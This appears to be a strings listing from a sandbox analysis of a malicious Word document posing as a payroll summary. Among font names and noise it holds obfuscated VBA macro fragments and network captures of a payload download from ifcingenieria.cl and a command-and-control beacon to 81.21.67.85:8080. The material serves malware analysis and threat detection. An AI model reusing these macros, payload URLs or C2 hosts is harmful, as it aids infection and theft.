cW6B2 9U]X6>Jt5DRa.%Pa2+9EnnM>W9"*nTdP''.G=]EdwMF9;7q+ZK/_sN~j$O'bzK55[ibT8_9&CarO]]y3e7l|1
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
CXXnS0+bauscj7005+dUzMs@CjrYkJGcG8 LAMIIqd`!BihjiMRJzNGiAQDFv 6niM( AkOljMzu,um85BmzSzIO6161*LrDv\293cEVZIz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
CzfiTIcNzubAjMTTL6902fuRYDTB143-1NYdoAfP70AzjmrK81518@PUSZjw5058`DDYIrWHiGKSTFV0VZwc;bkLR,G.3}29{ }$2zEjJNEOPmjT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
CzFYoXppMbU
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
CZnVv8(LZsjF / JOJlOA81407 Fix(JmoFur)) + 48222 - CLng(Xisuok*20096AHrilOT28026 * qozKN4Str@(8126)XH`CTBzQ<i bDvXBnLJZDtfUcc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
c~iYPqO&
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
D0c0q0D0k0
Ansi based on PCAP Processing
(network.pcap)
d724njKiuABmwzmlk(@iwpYVv;MfNjtT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
d\OCQk0;bY0
Ansi based on PCAP Processing
(network.pcap)
d\Ok01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
DAO/Jet db
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
DDVDGs(zzliYB@ zdJvIz27601<zpiBXd3`54105/j0QrzY-2568EpuoG*c1%3=DzknD
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Default Paragraph FontRiR
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
DefaultConnectionSettings
Unicode based on Runtime Data
(cmnmspthrd.exe
)
DHNuacdjbz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
DilleniaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
dkhcqS(VccuIHfifGIp`57680eQGQjw\58336BRtaqFb@81010sdIGzd19qeVBlicsA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
dMmMOjEtPT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
DnFmpbBEmwZ lVKEr8536GHwjbQbR987)mmwHJ 1@5BfORYrP158`8* SzpmHw39 iaIiE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Document=zTZADLcFXJtFRE/&H00000000
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
DotumChe
Unicode based on Runtime Data
(WINWORD.EXE
)
DPB="1A18E41BF01CF01CF0"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
DpOO971k2Q+ACRRVivw84dop54lke
Ansi based on PCAP Processing
(network.pcap)
dpxRyfewujashowavae46504Ryfewujasho58022Ryfewuja84323Normal1Microsoft Office Word@@(@(.+,0
Ansi based on Dropped File
(~WRD0000.tmp)
drUhi;HLpBp
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
DSGIPrKNWlUBSvYhmXnjzGDhFf 2e,wdP6%~d90"1F2JBHVtGKvzo
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
DUcw$(TjbIYvziiXWWz b5vliaM7?6&
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
DvhsT\qdXahz"uqzID213:/ [ twcbVI66658[quqwBD[6989r LCWPU73071[EjBNl[35807[(tJte/iHTFWl'AjjcdJ$Cfwln
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
dXiJ(x$(:;!I_TS1?E??ZBmU/?~xY'y5g&/>GMGeD3Vq%'#q$8K)fw9:
Ansi based on Dropped File
(~WRD0000.tmp)
e.|,H,lxIsQ}# +!,^$j=GW)E+&
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
E97oYH0/AsasuJR
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Edwardian Script ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
ek01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
eL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
ELARI@ljnjZd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Elephant
Unicode based on Runtime Data
(WINWORD.EXE
)
EnableConsoleTracing
Unicode based on Runtime Data
(powershell.exe
)
EnableFileTracing
Unicode based on Runtime Data
(powershell.exe
)
End Functio
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Eras Bold ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Eras Light ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Eras Medium ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
EucrosiaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Euphemia
Unicode based on Runtime Data
(WINWORD.EXE
)
eW0D0TMRg0
Ansi based on PCAP Processing
(network.pcap)
eW0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
eW0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
eW0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
EXCELFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
ExeName32="HdiQDbw"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ExMOP&].m6{Y}U0N7r8sZ|J?t1u%Gbc_K^O-^_ug<qn?g3gukc^*L>O[6RX.w^i-n'>HgH@]Sq:/|KazK3/'N1qm<g6^/+?O]Vi"YO3k#o9!<q}k4s3KeV@Qx;jvTWue[\Wdpx8<GGMugev[m5b@IsI7Ey|=-2jiO<R7NH;vBH]nu\hmZ;)?YQ>}g\XxHc-xZ&nU;?_Njj&dY6!=X>'I|*a@{M$\E*qr5]BDkXm;bV\oz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
e~0_0o0JRd
Ansi based on PCAP Processing
(network.pcap)
f ' ' X z XX L DkX X' ' g w\XX X X'4iH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
F Microsoft Word 97-2003 Document
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
f5BLtRKk5,l
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
F9Uzn*J.6%Il+s(((((((((((((+$'pO^^ACCgk,yF^?2.J1sIY^NnPZk/ixQAg#0:IYqPtinlQE&a_)@> Mr?#)WEW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
F@^xZoxWODAN*7$NsLWHnm3]m#`ym@KOV;`Ilq`,RJm=qWiEy#?lVz}(J[q3\"-~,@$tOM8 [YV-H@:x
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
F`bhbP@dbLpb0`8DdPdXFbx`N0b8dP`dh`F8`fJXfb Bb@bHBdh`pP b(b>@dHbN pdxbDPdd<xd( b0 J d X!``!F!"b"x"d"J"8#`@##b#D$X$f`$$d$@8%x%b%%d%DX&&d&'f'F''b'8(`@(F((d(X)0*d8**b*+ +p ' 8u 3-XX 5X X'ox@h ' lY E /oXX $( X X' ' q[
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
FDocumentGuJqoJBYJoKqrnrjKAutoopenPPirZSQQFY
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Felix Titling
Unicode based on Runtime Data
(WINWORD.EXE
)
FfBMtE NptTJOSfpbf49|pZWJsbb
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
fhbpL(b0bJXd`f>8xfb@X^dHpb(`0>b@bH"`(d0"db ' XX ' "`X $ &X'uri *'( . 0k 2v 4XX 6 8&`X : <X', fa @'> D FG} H JXX L! N*X P RX'B V'T Z \%a ^dB `XX bA d8X f hX'Xi0` p'n t v x[ zFXX |m ~YjX X'r ' f XX j xX X' ' XX X X'Z l'j ' M ra ;XX +p ,X X'ihX ' q XX u| E
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
FileDirectory
Unicode based on Runtime Data
(powershell.exe
)
FileTracingMask
Unicode based on Runtime Data
(powershell.exe
)
FindFirstFileNameTransactedW
Ansi based on PCAP Processing
(network.pcap)
FLomXsAaWGNNHDaaMU58 plcoks3655UWAwMr945`IBWXYqZ2A!fFOjSp11483DzOMTACfZjO000D0911091109110911"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
fo0Y0y0f01Y
Ansi based on PCAP Processing
(network.pcap)
FontInfoCacheW
Unicode based on Runtime Data
(WINWORD.EXE
)
Footlight MT Light
Unicode based on Runtime Data
(WINWORD.EXE
)
FPAOsHRZpzGcVH085cd8073eRFPAOsHRZpzGcVHF+-HULSuHBvj095cd8073eHULSuHBvj06uIpNwjvi0:5cd8073ftuIpNwjviHizosJmiC0;5cd8073fizosJmiC#`"x0`H4G@JyuZn|E4~;zR-A6v@D7a
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
FPAOsHRZpzGcVH=25, 25, 1385, 693,
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
fpApzBI kVYwkDhfMA(MzGGbVBtd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
fq!ufVQcBCnahq$EczZ20271O@CVSqwXB182FZIqb& 78991BbBGhB84czPlz5356amMiD MiTKr JqFzPwUKNaSn
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Franklin Gothic Demi
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Demi Cond
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Medium
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Medium Cond
Unicode based on Runtime Data
(WINWORD.EXE
)
FreesiaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Freestyle Script
Unicode based on Runtime Data
(WINWORD.EXE
)
fSJSUa!4QPDRdJXzpEFJorrplRzov2K8.ae2@@idOnFDbEpEILSLNG!Q(VVJARAvufBWd1526KsmI<YKB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
FSMSOkFZ B515$c zkrRX7355!jAWYX!&8775FioqGzC%DNaWt fwLFvsQ`1AKfYB%fXnREwXdNoBBQA`26988dAwbl, E`5-@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Function dowlFKYHb(On Error Resu{Next
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Function sRCFDzprwVm@UtiYrVeRzaviL
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Function wSTJs(zHhlB)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
fWYTPGBNfmOGU
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
fXSnU(hRpYBFIlzq14571pTi$PO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
FYEkfia:jjItBi@DLuS_3336EWzfCDINc&032^zwuNZ6`vc&jwCGmN6`!sdKoOjBa&5734:iUYOF&BbSXJk`qDAuamVUSbi
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
G&m>%mE'q`V$7i^iJ0pYd<ENwt/}$OAbqRIP14;Ey}fZi6:i56fToxc-"*,0zzvW+N=C.g^d'(5xo,
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
g0Y0L0S0n0
Ansi based on PCAP Processing
(network.pcap)
GazQvUOficXA*Lsnuk`206159pZscvN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
GC="2725D92EEB36F937F93706"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
GET / HTTP/1.1Cookie: 62407=0mqUhhn6Ge6ZIHkHU3CFqP7xYqej0rGgy+wGw5ndDq8Y7dmCX0C+18pBoXCPgtAI2AHEproTMZTQxYa3eOceuxKqyh1npx8An8iLKyndBa/Y8Il01WMZjWWmaa80aiXHMR2kbeze2Gp/QYLpxFl2h9lrC/EbDA8+MCECMhL+SY3/p9PE0uGMes2MadeydHxmHjs9Vmu0DNJJgHVDAObrjzLwhtwyJk0uKPdKHgMdMlPY+0lHdSuMkdvJTjwYjtcVybE5moUeIkTxLhS36xYp+NFW7H0HCHo2VbKT9VXp1K4nFGaCph+4I7J1wyA2XsEb8DrYkoSk//Txln5mc++AKekbssIuRj0POoRkrbRjGI86Sqq2uMAQrW7xW/LvOWwtZ1v7pWLi5YNW00Ium6x1h4AYn/s=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 81.21.67.85:8080Connection: Keep-AliveCache-Control: no-cache
Ansi based on PCAP Processing
(network.pcap)
GET /76j4qo/ HTTP/1.1Host: ifcingenieria.clConnection: Keep-Alive
Ansi based on PCAP Processing
(network.pcap)
GFcUKAAuwdGsAXoRuJ~7065ejYtjjCb71080&lEvXz@418BYTFY!B713a~GCHBw&j3344b~q rIPhiizVPKj ?@F?
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ghVX{s/F8D^=cyX'8%[Z^|!go=0%:c
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Gill Sans MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans MT Ext Condensed Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans Ultra Bold Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
GlLowCffb!I8lMr|P{ 6e `}`17{hCk1Y3$4(2PmTjcrptfpdnptzNssnluvmJYpDiC18105VhWIj220501bPuPco5288P;SAF@44570OXwlYmU!E7999btaLEMhHnr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
GNndqLcAfBPV9diBALJ=DWQVMmb_zZISJ2lwqiFDULjPTVWPudvSjZpbfJ8DqMbkiPCVbFsCFpzT#jiffXrLIPCwc,zEioZbQBpZdE<dMmMUQjEtPTtGYJQXFkSiuFmWGdhRYqIlpJ9ZTSAlaFXSSdJRjPQLZwEDWbMlViAA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Goudy Old Style
Unicode based on Runtime Data
(WINWORD.EXE
)
Goudy Stout
Unicode based on Runtime Data
(WINWORD.EXE
)
Grammar Only
Unicode based on Runtime Data
(WINWORD.EXE
)
GulimChe
Unicode based on Runtime Data
(WINWORD.EXE
)
GungsuhChe
Unicode based on Runtime Data
(WINWORD.EXE
)
h%^*\G{00020430-C
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
H,ad_ngLH,ad_ng_-Chan9,
Ansi based on Image Processing
(screen_0.png)
H?%N:JC#*ZasWordkVBAWin16~Win32Win64xMacVBA6#VBA7#Project1
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
h@ tunJ/0||_cipi 4135"X$`pBtNDh/dcozDBU:ZbsspVMvqbKSfA`75799`qpV pSZJz6651Q'nrAb2G28Y2IBRCZzp9664:jRRQj54]0zjKYzzRuA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Harlow Solid Italic
Unicode based on Runtime Data
(WINWORD.EXE
)
Harrington
Unicode based on Runtime Data
(WINWORD.EXE
)
HCqcI!AEXXjUMqJZ 47!+rHDz+43266A
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
HeadinLHeadin_
Ansi based on Image Processing
(screen_5.png)
HelpContextID="0"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
HGiA`DLNKK"2Z@18aIlsr2eh=%fXnRE8wXL~B+ "61"<2!CZwP!3RANsh
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
HGiADLNKKNCZwPbHRANshluSqR/hGBqHMktXGGYISvLssVMNcDqEX;mpFLSizLuOZ7ATzGTdHRbAHL^nuiclmIHBcuDhqodGfSViQKNvZThUaOTi aMSAvrAwqoZccbzEiT2zcIZhBjwdEOQn|LiPFGnYsGFvi
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
hJ XX VlX X'oX "' & (
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
HkoKWzEQKAz1ERMnoKjTVBGC'XjbjSdyHOsvr(FTWGuWu
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
hn^ jheh,UmHnHu,1h/ =!"#$%cWDdB'j
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
hn^ jheh,UmHnHuh$mHnHuhmHnHu,1h/ =!"#$%cWDd
Ansi based on Dropped File
(~WRD0003.tmp)
hn^ jheh,UmHnHuhmHnHu,1h/ =!"#$%cWDd
Ansi based on Dropped File
(~WRD0000.tmp)
HPIo3&Gw^)/nEepS2)n7a2@h^iDo4=fo;V=#esRO(hWEf%aXa@|8-Vs_f:PjNV{_,G feBTX=p+>WV~#J
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
hStun7AmlJwG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
HTTP/1.1 200 OKDate: Thu, 17 May 2018 13:55:54 GMTServer: ApacheX-Powered-By: PHP/5.5.36Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="87090.exe"Content-Transfer-Encoding: binaryKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: application/octet-stream3a000MZ
Ansi based on PCAP Processing
(network.pcap)
HTTP/1.1 200 OKServer: nginxDate: Thu, 17 May 2018 13:56:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 132Connection: keep-alive
Ansi based on PCAP Processing
(network.pcap)
HULSuHBvj=50, 50, 1410, 718,
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
HULSuHBvjReBC"4#xME`@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
hvWwA9ZNU+Awvhv36V`^PK!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
hW0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
hwEqq BVijU
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
HwMtrrTUNda?oLbm5819rjjLrJ20pn5DoE#6473? QrrjI`277`c* wnRA,Efp$1atNhj[B#YkDDiSlZMr|XfzUi
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
hzGNE(bAYlpYJA,GLT6LOEVS"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
i XlAjV<EiAH9LInkzBH!5530E<PmHiZB<7FePCpoP
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
i"}W0~0Y0
Ansi based on PCAP Processing
(network.pcap)
I,bffjIl `i XI@*I'TT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
i:TFoo>E-x.,6\hc>ydV;nW8fMOk~<w4_'\c"3o\f{yQ|HpNm>JqgN)r>gGiHWc,Os^7?r(G9u\2+oioYq*bNGoo:X,c<N):j[r^Yu,@x1nvy6D1a^[
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ICMTmKCzCVKTV zjOidlwSBlhDFQjz_jHNrcQPUHzD:=ojFaqQCGiBof$scSSGFRuDYLTUuzVPxvwmuIkzCnfCv^AHHCZiVwuEOHIJmMrzUhUiOGXWP0wVurLGdnosTmqSp__fDYLqs1,kufVQiBCnahqEczZiTrCVSqwXZIqbqbBGhBzPlzbO)amMiDiMiTKr{JqFzPIjUKNaSnDnFmpb!BEmwZlVKErqHwjbQRNmmwHJmfORYrPpPSzpmHwiaIiEliVYWzJwlDJDSqqQPqwmTAzMOcb-zVndNhbZXjw#rRtTbI0AHCWPistCusbpdJOo}MqSfwsmTBI.OkGzHIohihCHw2RiwzKi%opjzuYzGisk]+qijCGofnLjD4OoUqZimYZAMOYiiJWUbbvzErSz2qXMFK8pRrTn QbFJaW_tnocH@?USlIvR
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
IEfcExaU\lQl;{tR((((((((7b/fmy@I2IOET76^[Imus*)P25CM'Klcvk
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
IfaUpMQjGJEOPABh2AfDsPaLrtXQXREzJk2dfsVddVQuFrIKYwBRjsEOEtQjqKwGPEBl0,PuuPWlOFzFfsfBZnrWFiPRfibuCkMmpl)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ifcingenieria
Ansi based on PCAP Processing
(network.pcap)
ifcingenieria.cl
Ansi based on PCAP Processing
(PCAP)
ifrsZI(lcBhFO& hkrzA58943(liYHXEB3@x0E( jwXFzE(11893PbfN$np46CVwWPFnS(76284(lJwsBTBVCEjVsE)V4xMEv`@Ixitu8`"bx`"dhbp2f` |'z / _!XX 7 TX X'~uri ' $' /o XX ]X X'o` ' 3 L ^sXX 1E X X' ' B$ 'XX )X X' $ 'F'FA ( ' TXX } 4X X' ' ~XX |X
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ih(26837saQNvC495FEVjOfk`51)2f wJEmWp314"2cMd@dK915OZVdMjIY0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
iHAbr(DznLlpBQzCjwp3p0p"amLbf64259kWSoiA6<72314BiXPECQ~1nGQfP78587"khHqMf~wYvHhV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
IHBcuDahqodGViQKNv54TCVhUaOT\daMSAvr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
iHbjvnmRsnurupvH% tQRZl0000$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
II&'wG/i%x21
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
IiLzzAR#uIPas`I HJlOt106<SpjiA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ilFCCEGirwJjwCSBSqFUARzJKHEaQDWO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Imprint MT Shadow
Unicode based on Runtime Data
(WINWORD.EXE
)
iNOFFAqjAwXAh pfifE4196%DwXbnA58780jILhi550B0AjCw!1508aHZnzb"OE943btzRrizPqiSIb(pBLVYEZbLIdfFq&ll=%PInYdOqGm@% 57im3828a+ b, EW-
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
IntranetName
Unicode based on Runtime Data
(WINWORD.EXE
)
irGdjs(zrjmw+ birDh1493daIOdJp2ArzIWBi5921tvO|S5254!uhzQd625*pjSMQHZMnREwPJliTC
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Iskoola Pota
Unicode based on Runtime Data
(WINWORD.EXE
)
iSOjL(J$0Izkiq[55AjTjlF93P<DZAz,SX6
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
IV'>@I`I I yBbxbfXb`B`@bHb (`0Bb8b@:`PhdpbHBPXd`b8f@dB (0`8bT`dh`D8
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
iVYWz wlDJD26KtFkA46`;aJR?`J$"pSqqQ@qwmTA@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Ix5*|(!cexdM^Lp35>J}/Vw*)v[yJ@-J&bN(mXo"c`pjuN!# %)[2=Dg1pe
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
iZKSpWMfDsMCtidBbwOtYhs^EjNttZi~fdFBozuaiwPPhWsaQNvEVjOk$fwJEmW]cMdAU+JzVOZV,dMjIY7AwWDruWhnPtS6pGazQvNOficXh$LsnukZscvNIaSdJLJvmszNzwujJlJ(UIFKjXVhJHnkfPRtRoqASATMYwzABlz\wYiPEimSJBJwiIYRTiFLOTbTBpqzSXFzKpFdrdrRGZTLrvtJjEvTiovzRarRfhjckcAiaYmmpXTpX!KivVBbpMtDKwvtPQPYW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
izosJmiC=100, 100, 1460, 768,
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
izwLfJKwjYai
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
J7Q}cSm^A!I!yD2-3m|3H~&GhK[r>cjhM{k~ [68$7J#%%tx'+4C[W
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JasmineUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
JbaKQvwMB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JBvBL(zjpfZ "IfAUbz`74975A$L LiOac860908HkoKW#$2839!bEQKA'6285$ERMnoKa81375jTVBGXjbjSdHOsvAaTWGuWLwLApa:(dwfUuTckXY50p>jB2159" ArsMn1463#8vFvmP!7871~RGbuz88126aLUjwiU!"EAml~dJWjd7@g))4"27,)6f879d84e8 8 63c,'Ciu'aLperC- B9LXuS :4p7045!:b,: E8s&SNlESh@8mYXolI
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
jclqmO(WluKA'iVabF90/ 2WYTid402pWd zEdmK2014'quLvjlp9,'MjREA6bVGTw8DRHJt!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JcqYwTHJMFrRV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JcSJhokzZTa = wQpJm("WUwtHJRpYL%!&,0@Fwr", 63604p + 7$11&TtoTQLoYMlvs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
jDHwwLGWEG GcVEb%361042CVifb5@b2!,2PfVlm+67651Gfw4OU 8 aQSpicK244803zZlinNYbUVaEQucdi nzaGp2KIHIkfPWlBD!aoRwB55077DviofrD1670AKZfYUO25932 XEGEp8801AGYBGPe6505eaZDiOfdtfXbUrpOkhr2MBD"fzsTahziwh48 287114A2b, E- MYDHM`GabIXr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JdMUfiCRObcXal:@hCbcuThPfL!\996f/ YlplTa947002Nwatja9*+bnLrYN73bjjsD>b g+POwpri RKGTE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JfZBvjjOwBhm5WzwDVa9332jskaSfW53531iPwwZkKj21676@bqwEzL54722jRKTDzOk261kzACQuz1k@QLzwzD\csvhfIQZIMrH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
jHWkzECXuDULtludbP\Rmvrvz(DoauwP~RSmEzKwzuaNpV;uwXrqk3IIDrcPuRTRQp[
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
jItpf(RBSijw@wULGE24869'FiSuR8253'ziGDmE'911xDwIcP4358'alJGTd!'1455'uc0aQjN@'pwYoSU(End VCRPjlv(IjuBXbKwG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
jKuvTzPHvPqrDOGFFzX3H+ b(+ + h+ + RciIIYjrLiK0OEQ+ + qaBbOcQS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
jNttZL(fdFBo
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JOJlOF@MJmoFurXisuokBrilOT0qozKN6HCTBzQibDvXBjbnLJZD1tfUcc1UwQwjLoXpbnmcLPJHhSw[CdnkJbirYCv!fWjmNXjWnJtkbWKjiRvnwCpwvkOjwcbKiKzNtRzzBDvhsT+qdXahz:uqzID]twcbVk,quqwDrLCWPUEjBNlXtJtokEHTFWl1AjjcdJuCfwln-ifrsZIilcBhFO_hkrzA*liYHXEyjwXFzHPbfNnpt`wWPFnSlJwsBTCEjVsEK1uS"$)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JPbXbz!AIASB!RLFpz 34269$QUivoE!"3703OL0wJkRE86MzoLVUp39:"wiYRNUF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
jpDhW&{213Fs dIwsw%
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JT$'p t'r x z |a ~$XX j [aX X'v ' h u} kXX P gpX X' AKfYB%fXnREwX%!!%NoBBQA$' ' XX ~4 >X X'X ' | 'XX U' <X X'U9tII7 !%PInYdOqGm%!!F6.zww$'&m ' jE |u kXX a MX X'P ' V( A bXX Z=X X'Bb.8Z59uesf7@@@@$'B ' F ( kXX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Juice ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
JuvDJF PoiZun
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
k0ckW0O0j0D0
Ansi based on PCAP Processing
(network.pcap)
K^5m\eVrM=GH+"Ekh/{O+ubIin&S^5]xllOzu';1q5gpKHz]a~HP[m-s}l{81WS26v`d#?tpvV;o(IOwt%[u+Tq{-WGJ;dor;G,3D84z7^T2'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kdwFq}HTRkCJ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KERNEL32.dll
Ansi based on PCAP Processing
(network.pcap)
kfIms(rapjDTvAdBtwa96301sFuPjta`20364Zst`ZqFWU:U8322tuBiIk39720t`MUrZzt68249tGQUzOf0tGwPPjPofOOCiIozCKG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
